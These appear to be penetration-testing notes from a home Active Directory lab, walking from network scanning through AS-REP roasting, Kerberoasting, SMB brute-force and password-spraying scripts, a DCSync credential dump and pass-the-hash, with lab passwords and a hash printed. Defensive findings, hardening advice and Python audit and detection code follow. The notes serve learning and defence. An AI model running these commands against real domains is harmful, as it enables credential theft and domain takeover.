# Active Directory Penetration Testing — Complete Notes
### Based on GOAD-Mini Lab Assessment

---

## Table of Contents
1. [Lab Environment](#lab-environment)
2. [Methodology Overview](#methodology-overview)
3. [Tools Used](#tools-used)
4. [Phase 1 — Reconnaissance & Network Discovery](#phase-1--reconnaissance--network-discovery)
5. [Phase 2 — Service Enumeration (SMB)](#phase-2--service-enumeration-smb)
6. [Phase 3 — User Enumeration](#phase-3--user-enumeration)
7. [Phase 4 — Password Discovery & Credential Acquisition](#phase-4--password-discovery--credential-acquisition)
8. [Phase 4.5 — Authenticated AD Enumeration](#phase-45--authenticated-ad-enumeration)
9. [Phase 5 — Advanced Exploitation](#phase-5--advanced-exploitation)
10. [Vulnerabilities Found](#vulnerabilities-found)
11. [Defensive Recommendations](#defensive-recommendations)
12. [Key Takeaways](#key-takeaways)

---

## Lab Environment

| Component | Detail |
|---|---|
| Hostname | KINGSLANDING |
| Domain | SEVENKINGDOMS / sevenkingdoms.local |
| Domain SID | S-1-5-21-3262952663-1425775882-330886615 |
| IP Address | 192.168.56.10 |
| OS | Windows Server 2019 |
| Role | Domain Controller (AD DS + DNS) |
| Attacker OS | Linux (Kali/Debian) |
| Network | Host-only (192.168.56.0/24) |

---

## Methodology Overview

```
1. Reconnaissance       → Network discovery, port scanning
2. Enumeration          → SMB, LDAP, user & group discovery
3. Credential Discovery → Password attacks, reuse testing
4. Exploitation         → AS-REP Roasting, Kerberoasting, DCSync
5. Post-Exploitation    → Lateral movement preparation
```

---

## Tools Used

| Category | Tools |
|---|---|
| Network Scanning | Nmap, Nmap NSE scripts |
| SMB Enumeration | Enum4linux, Enum4linux-ng, rpcclient, smbclient |
| LDAP Enumeration | ldapsearch, ldapdomaindump |
| Kerberos Attacks | Kerbrute, Impacket GetNPUsers, GetUserSPNs |
| Password Cracking | hashcat (modes 18200, 13100) |
| Brute Force | Hydra (limited), custom bash scripts, CrackMapExec/NetExec |
| Exploitation | Impacket secretsdump |
| Post-Exploit | crackmapexec, rpcclient |

---

## Phase 1 — Reconnaissance & Network Discovery

### Command
```bash
nmap -sV -sC -p- --min-rate 1000 192.168.56.10
```

### Key Findings
- **14 open ports** — confirmed full AD domain controller
- **Standard AD ports** all open (Kerberos 88, LDAP 389, SMB 445, etc.)
- **Port 80 (HTTP)** open — extra attack surface
- **WinRM ports 5985/5986** open — remote management accessible
- **Both LDAP (389) and LDAPS (636)** available, plus Global Catalog (3268/3269)

### Domain Info Revealed by Nmap
```
Domain:   sevenkingdoms.local
Site:     Default-First-Site-Name
Hostname: kingslanding.sevenkingdoms.local
```

### SSL Certificate (from LDAPS scan)
```
Subject:    commonName=kingslanding.sevenkingdoms.local
Valid From: 2026-01-24
Valid To:   2027-01-24
SAN:        DNS:kingslanding.sevenkingdoms.local
```

---

## Phase 2 — Service Enumeration (SMB)

### Enum4linux
```bash
enum4linux -a 192.168.56.10
```

**Findings:**
- Domain: SEVENKINGDOMS
- NetBIOS Name: KINGSLANDING
- MAC: 08:00:27:cd:d4:fb (VirtualBox NIC)
- ⚠️ **Anonymous sessions: ALLOWED** (username '', password '')
- ✅ SMB signing: Enabled and Required (protects against MITM/relay attacks)

### Enum4linux-ng (Advanced)
```bash
enum4linux-ng -A -oJ enum4linux-ng.json 192.168.56.10
```
Provides: share enumeration, user/group enum, password policy info.

### Nmap SMB Scripts
```bash
nmap --script=smb* 192.168.56.10
```
Key scripts: `smb-enum-shares`, `smb-enum-users`, `smb-os-discovery`, `smb-security-mode`, `smb-vuln-*`

> ✅ **SMB signing confirmed required** — good security control, prevents relay attacks.
> ⚠️ **Anonymous sessions allowed** — information disclosure risk.

---

## Phase 3 — User Enumeration

### Technique 1: Kerbrute (Most Effective)
```bash
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt
```

**How it works:**
- Valid username → `KDC_ERR_PREAUTH_REQUIRED` (user exists, needs password)
- Invalid username → `KDC_ERR_C_PRINCIPAL_UNKNOWN` (not found)

**Advantages:** Fast, no auth needed, low detection risk, bypasses anonymous restrictions.

---

### Technique 2: AS-REP Roasting for User Discovery
```bash
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile userlist.txt -format hashcat
```

**Dual benefit:** Discovers valid usernames AND identifies vulnerable accounts simultaneously.

**Output messages explained:**

| Message | Meaning |
|---|---|
| `UF_DONT_REQUIRE_PREAUTH not set` | User exists but pre-auth is ON — not roastable |
| `KDC_ERR_C_PRINCIPAL_UNKNOWN` | Username doesn't exist |
| `KDC_ERR_CLIENT_REVOKED` | Account disabled/locked |
| `$krb5asrep$23$user@DOMAIN:...` | ✅ Hash captured — account is AS-REP roastable! |

---

### Technique 3: SMB/RPC Enumeration
```bash
enum4linux -U 192.168.56.10
rpcclient -U "" -N 192.168.56.10 -c enumdomusers
```
Less reliable; often needs authentication.

### Technique 4: LDAP Anonymous Query
```bash
ldapsearch -x -H "ldap://192.168.56.10" -b "DC=sevenkingdoms,DC=local" "(objectClass=user)" sAMAccountName
```
Typically fails on properly configured AD (auth required — and in this lab it was blocked ✅).

---

### Discovered Users (27 total)

| Account | Type | Notes |
|---|---|---|
| Administrator | Admin | High-value target |
| TestAdmin | Admin | Test account |
| DCSyncUser | Privileged | High-value target |
| krbtgt | System | Critical — used in Golden Ticket attacks |
| KINGSLANDING$ | Computer | DC computer account |
| ASREPUser1 | Test | Pre-auth DISABLED — roastable |
| ASREPUser2 | Test | Pre-auth DISABLED — roastable |
| SprayUser1, SprayUser2 | Test | Intended for spray testing |
| TestUser | Test | Pre-auth disabled; Password: `Password123!` |
| ExchangeService | Service | Has SPN — Kerberoastable |
| FileService | Service | Has SPN — Kerberoastable |
| SQLService | Service | Has SPN — Kerberoastable |
| WebService | Service | Has SPN — Kerberoastable |
| cersei.lannister, jaime.lannister, joffrey.baratheon, etc. | Users | GoT-themed GOAD accounts |
| Guest | Built-in | Usually disabled |
| vagrant | Lab | Vagrant deployment account |

---

## Phase 4 — Password Discovery & Credential Acquisition

### Step 1: AS-REP Roasting (No Auth Needed)
```bash
# Get hashes
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 \
  -usersfile userlist.txt -format hashcat -outputfile asrep_hashes.txt

# Crack hashes (mode 18200)
hashcat -m 18200 -a 0 asrep_hashes.txt ./passlist.txt
```

**Cracked:**
- `TestUser:Password123!`
- `ASREPUser1:Password123!`
- `ASREPUser2:Password123!`

---

### Step 2: Kerberoasting (Needs 1 Valid Account)
```bash
# Request service tickets
GetUserSPNs.py -dc-ip 192.168.56.10 \
  sevenkingdoms.local/TestUser:Password123! \
  -request -outputfile kerberoast_hashes.txt

# Crack hashes (mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
```

**Targets:** ExchangeService, FileService, SQLService, WebService (all had SPNs)
**Result:** All cracked with `Password123!`

---

### Step 3: SMB Brute Force

#### Why Hydra/Medusa FAIL on modern Windows Server 2019:
- SMB signing required — these tools don't handle it
- SMB 1.0/2.0 only — Server 2019 uses SMB 3.x
- Auth handshake mismatches

#### Working approach — custom bash script:
```bash
for user in $(cat users.txt); do
  for password in $(cat passlist.txt); do
    smbclient -L 192.168.56.10 -U "$user%$password" -N >/dev/null 2>&1
    if [ $? -eq 0 ]; then
      echo "VALID: $user:$password" >> valid_credentials.txt
    fi
  done
done
```

#### CrackMapExec / NetExec (Recommended):
```bash
crackmapexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success
# OR newer:
netexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success
```
Better lockout detection, faster, modern SMB support.

---

### Step 4: Password Spraying (Low Lockout Risk)
```bash
for password in $(cat spray_passwords.txt); do
  for user in $(cat users.txt); do
    smbclient -L 192.168.56.10 -U "$user%$password" -N >/dev/null 2>&1
    if [ $? -eq 0 ]; then echo "[+] VALID: $user:$password"; fi
    sleep 2  # avoid lockouts
  done
done
```

---

### Account Lockout Awareness

| Setting | Windows Default |
|---|---|
| Lockout threshold | 5 failed attempts |
| Lockout duration | 30 minutes |
| Counter reset | 30 minutes |

**Best practices:**
- Use `sleep 2` between attempts
- Use password spraying (few passwords × many users) over brute force
- Monitor for lockout error messages
- Prioritize service accounts first, avoid Administrator initially

---

### Credential Discovery Results

| Account | Password | How Found |
|---|---|---|
| TestUser | Password123! | AS-REP Roasting |
| ASREPUser1 | Password123! | AS-REP Roasting |
| ASREPUser2 | Password123! | AS-REP Roasting |
| ExchangeService | Password123! | Kerberoasting |
| FileService | Password123! | Kerberoasting |
| SQLService | Password123! | Kerberoasting |
| WebService | Password123! | Kerberoasting |
| **Administrator** | **8dCT-DJjgScp** | **Dictionary brute force** |

---

### Password Reuse Testing
```bash
found_password="8dCT-DJjgScp"
for user in $(cat users.txt); do
  smbclient -L 192.168.56.10 -U "$user%$found_password" -N >/dev/null 2>&1
  if [ $? -eq 0 ]; then echo "REUSE: $user:$found_password"; fi
done
```

---

## Phase 4.5 — Authenticated AD Enumeration

Once `Administrator:8dCT-DJjgScp` was obtained, full authenticated enumeration was performed.

### LDAP Queries

#### Users:
```bash
ldapsearch -x -H "ldap://192.168.56.10" \
  -D "Administrator@sevenkingdoms.local" -w "8dCT-DJjgScp" \
  -b "DC=sevenkingdoms,DC=local" "(objectClass=user)" \
  sAMAccountName userPrincipalName description
```

#### Groups:
```bash
ldapsearch ... "(objectClass=group)" cn member memberOf
```

#### Computers:
```bash
ldapsearch ... "(objectClass=computer)" name operatingSystem lastLogon
```

#### OUs:
```bash
ldapsearch ... "(objectClass=organizationalUnit)" ou description
```

### Full Domain Dump
```bash
ldapdomaindump -u "SEVENKINGDOMS\\Administrator" -p "8dCT-DJjgScp" \
  192.168.56.10 -o ldap_dump/
```

**Output files:** `domain_users.json`, `domain_groups.json`, `domain_computers.json`, `domain_ous.json`, `domain_policy.json`

---

## Phase 5 — Advanced Exploitation

### DCSync Attack
```bash
secretsdump.py -dc-ip 192.168.56.10 \
  sevenkingdoms.local/Administrator:8dCT-DJjgScp@192.168.56.10 \
  -just-dc
```

**What it extracts:**
- NTLM hashes for ALL domain accounts
- LM hashes (if enabled)
- Kerberos AES keys
- **krbtgt hash** → enables Golden Ticket attacks

**Why it's catastrophic:** Single command = complete domain credential dump.

**Required permissions for DCSync:**
- Domain Admin, OR
- "Replicating Directory Changes", OR
- "Replicating Directory Changes All" rights

---

### Authenticated SMB Enumeration (Pass-the-Hash)
```bash
crackmapexec smb 192.168.56.10 \
  -u Administrator \
  -H c66d72021a2d4744409969a581a1705e \
  --shares
```

### RPC Enumeration (Authenticated)
```bash
rpcclient -U "Administrator%8dCT-DJjgScp" 192.168.56.10
> enumdomusers
```

---

## Vulnerabilities Found

### Critical

| ID | Finding | Impact |
|---|---|---|
| F-01 | Weak Domain Admin password (`8dCT-DJjgScp`) | Immediate full domain control |
| F-02 | Excessive privileges enabled DCSync | All domain credentials extracted in one operation |

### High

| ID | Finding | Impact |
|---|---|---|
| F-03 | AS-REP Roastable accounts (ASREPUser1, ASREPUser2) | Offline cracking without authentication |
| F-04 | Kerberoastable service accounts with weak passwords | Service account takeover, lateral movement |

### Medium

| ID | Finding | Impact |
|---|---|---|
| F-05 | Partial anonymous SMB sessions allowed | Unauthenticated info gathering |
| F-06 | HTTP (port 80) open on DC | Extra attack surface, potential info leak |

### Positive Controls Observed ✅

| ID | Control | Value |
|---|---|---|
| P-01 | SMB signing required | Prevents relay/MITM attacks |
| P-02 | Anonymous LDAP bind disabled | Prevents unauthenticated directory scraping |

---

## Defensive Recommendations

### Immediate (High Priority)

1. **Eliminate weak/default credentials**
   - Reset Administrator and all service accounts
   - Use unique passwords — no sharing across accounts
   - Store privileged credentials in a vault

2. **Fix Kerberos pre-auth misconfigurations**
   - Enable pre-authentication on ALL user accounts
   - Audit for `DONT_REQ_PREAUTH` flag regularly
   - Alert on changes to this flag

3. **Strengthen password policy**
   - Minimum 14+ characters (higher for privileged/service accounts)
   - Enforce complexity or use long passphrases
   - Enable password history + minimum age
   - Implement MFA for administrative access
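As an added example (not part of the original notes), the following Python audits user records for the account flags behind F-03 and F-04, covering the `DONT_REQ_PREAUTH` audit in item 2 and the SPN/gMSA point in item 5 below: it reports `DONT_REQ_PREAUTH`, `PASSWD_NOTREQD`, and SPNs on ordinary user accounts whose passwords never expire. The records mimic the per-object layout of `ldapdomaindump`'s `domain_users.json` but are constructed here, SPN value included.

```python
"""Flag the userAccountControl settings behind F-03/F-04 (added audit helper).
Records mimic ldapdomaindump's domain_users.json layout (attribute -> list of
values) but are constructed for this example, SPN value included."""
# userAccountControl bits (MS-SAMR / MS-ADTS)
ACCOUNTDISABLE       = 0x0002
PASSWD_NOTREQD       = 0x0020
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH     = 0x400000          # AS-REP roastable
TRUST_ACCOUNT        = 0x1000 | 0x2000   # WORKSTATION_ | SERVER_TRUST_ACCOUNT (computers, DCs)

def first(attrs, name, default=None):
    """Single-valued attribute from ldapdomaindump's list-of-values layout."""
    vals = attrs.get(name) or []
    return vals[0] if vals else default

def audit_users(records):
    """Return {sAMAccountName: [findings]} for enabled accounts that break the recommendations above."""
    report = {}
    for rec in records:
        attrs = rec["attributes"]
        name = first(attrs, "sAMAccountName", "?")
        uac = int(first(attrs, "userAccountControl", 0))
        if uac & ACCOUNTDISABLE:
            continue                      # disabled accounts are neither roastable nor sprayable
        findings = []
        if uac & DONT_REQ_PREAUTH:
            findings.append("DONT_REQ_PREAUTH set (AS-REP roastable)")
        if uac & PASSWD_NOTREQD:
            findings.append("PASSWD_NOTREQD set (empty password allowed)")
        spns = attrs.get("servicePrincipalName") or []
        if spns and not uac & TRUST_ACCOUNT:   # SPNs on a user account, not a computer account
            findings.append(f"user account with {len(spns)} SPN(s) (Kerberoastable; prefer gMSA)")
            if uac & DONT_EXPIRE_PASSWORD:
                findings.append("service password never expires")
        if findings:
            report[name] = findings
    return report

# Constructed sample; 0x200 = NORMAL_ACCOUNT, 0x82000 = SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
SAMPLE_USERS = [
    {"attributes": {"sAMAccountName": ["ASREPUser1"], "userAccountControl": [0x200 | DONT_REQ_PREAUTH]}},
    {"attributes": {"sAMAccountName": ["SQLService"], "userAccountControl": [0x200 | DONT_EXPIRE_PASSWORD],
                    "servicePrincipalName": ["MSSQLSvc/kingslanding.sevenkingdoms.local:1433"]}},
    {"attributes": {"sAMAccountName": ["KINGSLANDING$"], "userAccountControl": [0x82000],
                    "servicePrincipalName": ["HOST/kingslanding.sevenkingdoms.local"]}},
    {"attributes": {"sAMAccountName": ["Guest"], "userAccountControl": [0x200 | ACCOUNTDISABLE | PASSWD_NOTREQD]}},
    {"attributes": {"sAMAccountName": ["jon.snow"], "userAccountControl": [0x200]}},
]
```

Run `audit_users(json.load(open("ldap_dump/domain_users.json")))` against a real dump to get the same report for the whole domain.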

### Long-Term (Strategic)

4. **Privileged Access Management (PAM)**
   - JIT (Just-In-Time) privilege elevation
   - Privileged Access Workstations (PAWs)
   - Regular access reviews; reduce Domain Admin members

5. **Service Account Hardening**
   - Migrate to **gMSA** (Group Managed Service Accounts) — auto-rotating passwords
   - Deny interactive logon for service accounts
   - Constrain delegation
   - Reduce SPN exposure

6. **Reduce DC Attack Surface**
   - Remove non-essential services (e.g., no HTTP on DCs)
   - Role separation — no extra workloads on DCs

7. **Network Segmentation**
   - Isolate DCs from user subnets
   - Firewall/ACL for SMB (445), WinRM (5985/5986), LDAP (389/636), Kerberos (88)

8. **LAPS — Local Admin Password Solution**
   - Randomize local admin passwords per machine
   - Prevent lateral movement via password reuse

### Monitoring & Detection

9. **Enable Advanced Auditing** for:
   - Account Logon (success + failure)
   - Logon/Logoff (success + failure)
   - Account Management
   - Directory Service Access
   - Privilege Use
   - Policy Change

10. **Alert on these AD attack patterns:**
    - Unusual Kerberos auth failures (enumeration/spraying)
    - Spike in TGS requests to SPNs → Kerberoasting
    - DC replication operations from non-DC hosts → DCSync
    - Excessive failed logons across many users → password spray
    - Privileged group membership changes
    - Unexpected admin logons

11. **Protected Users Group** — add high-value accounts to prevent credential caching, Kerberos delegation abuse, etc.
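As an added illustration (not from the notes or from any vendor tooling), the Python below implements three of the alert patterns in item 10 over constructed events modelled loosely on Security log IDs 4768, 4769 and 4662; the flattened field names, the thresholds and the non-DC source address 192.168.56.50 are assumptions.

```python
"""Toy detection logic for the Kerberos/DCSync alert patterns above (added example).
Events are constructed, flattened stand-ins for Security log IDs 4768/4769/4662;
field names are assumptions, not the EVTX schema."""
from collections import defaultdict

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # 4768 failure: no such user -> username enumeration
KDC_ERR_PREAUTH_FAILED = "0x18"       # 4768 failure: bad password -> password spraying
RC4_HMAC = "0x17"                     # 4769 ticket etype requested by Kerberoasting tools
# Control-access rights that grant DCSync: DS-Replication-Get-Changes / -Get-Changes-All
REPLICATION_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                     "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")

def kerberos_failures_by_source(events, status, threshold):
    """Client IPs whose 4768 failures with `status` cover >= threshold distinct accounts."""
    accounts = defaultdict(set)
    for e in events:
        if e["id"] == 4768 and e["status"] == status:
            accounts[e["ip"]].add(e["account"].lower())
    return {ip: len(a) for ip, a in accounts.items() if len(a) >= threshold}

def kerberoast_suspects(events, threshold):
    """Accounts that requested RC4 service tickets for >= threshold distinct SPNs."""
    services = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4_HMAC:
            services[e["account"].lower()].add(e["service"].lower())
    return {acct: len(s) for acct, s in services.items() if len(s) >= threshold}

def dcsync_suspects(events, dc_ips):
    """(ip, account) pairs exercising replication rights from a host that is not a known DC."""
    return sorted({(e["ip"], e["account"]) for e in events
                   if e["id"] == 4662 and e["ip"] not in dc_ips
                   and any(g in e["props"].lower() for g in REPLICATION_GUIDS)})

# Constructed telemetry: enumeration and Kerberoasting from 192.168.56.50 (assumed non-DC host),
# benign AES ticket traffic from the DC itself, then a DCSync from the non-DC host.
SAMPLE = (
    [{"id": 4768, "ip": "192.168.56.50", "account": f"user{i}",
      "status": KDC_ERR_C_PRINCIPAL_UNKNOWN} for i in range(30)]
    + [{"id": 4768, "ip": "192.168.56.10", "account": "jon.snow", "status": KDC_ERR_PREAUTH_FAILED}]
    + [{"id": 4769, "ip": "192.168.56.50", "account": "TestUser", "service": s, "etype": RC4_HMAC}
       for s in ("ExchangeService", "FileService", "SQLService", "WebService")]
    + [{"id": 4769, "ip": "192.168.56.10", "account": "KINGSLANDING$", "service": "krbtgt", "etype": "0x12"}]
    + [{"id": 4662, "ip": "192.168.56.50", "account": "Administrator",
        "props": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}]
)
```

Thresholds should be tuned to the environment; the single `0x18` failure from a real user is below threshold and stays quiet, while 30 unknown principals from one host and four RC4 tickets from one account are not.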

---

## Key Takeaways

### Attack Side
- **Enumeration is decisive** — thorough recon directly enables all downstream attacks
- **One weak privileged credential collapses the entire domain** — even with good controls elsewhere
- **Service accounts are high-value targets** — SPNs + weak passwords = easy offline cracking
- **Password reuse is a force multiplier** — one cracked password can open many accounts
- **AS-REP Roasting is free** — no credentials needed, purely passive from the network

### Defense Side
- **Network controls alone are not enough** — credential hygiene is non-negotiable
- **Many AD attacks are detectable** — proper auditing + centralized logging + alerting
- **Least privilege matters** — smaller blast radius if one account is compromised
- **gMSA for service accounts** — removes the human password hygiene problem entirely
- **Clock sync (NTP) is critical for Kerberos** — drift > 5 min causes `KRB_AP_ERR_SKEW` and breaks auth

---

## Quick Reference: Hash Cracking Modes

| Attack | Hash Prefix | Hashcat Mode |
|---|---|---|
| AS-REP Roasting | `$krb5asrep$23$` | 18200 |
| Kerberoasting | `$krb5tgs$23$` | 13100 |
| NTLM | (no prefix) | 1000 |

---

## Quick Reference: Key Commands

```bash
# Kerbrute user enum
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt

# AS-REP Roasting
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile users.txt -format hashcat -outputfile asrep.txt

# Kerberoasting
GetUserSPNs.py -dc-ip 192.168.56.10 sevenkingdoms.local/user:pass -request -outputfile kerb.txt

# Full domain dump
ldapdomaindump -u "DOMAIN\\user" -p "pass" 192.168.56.10 -o ldap_dump/

# DCSync
secretsdump.py -dc-ip 192.168.56.10 sevenkingdoms.local/Administrator:pass@192.168.56.10 -just-dc

# Crack AS-REP
hashcat -m 18200 -a 0 asrep.txt wordlist.txt

# Crack Kerberoast
hashcat -m 13100 kerb.txt wordlist.txt
```
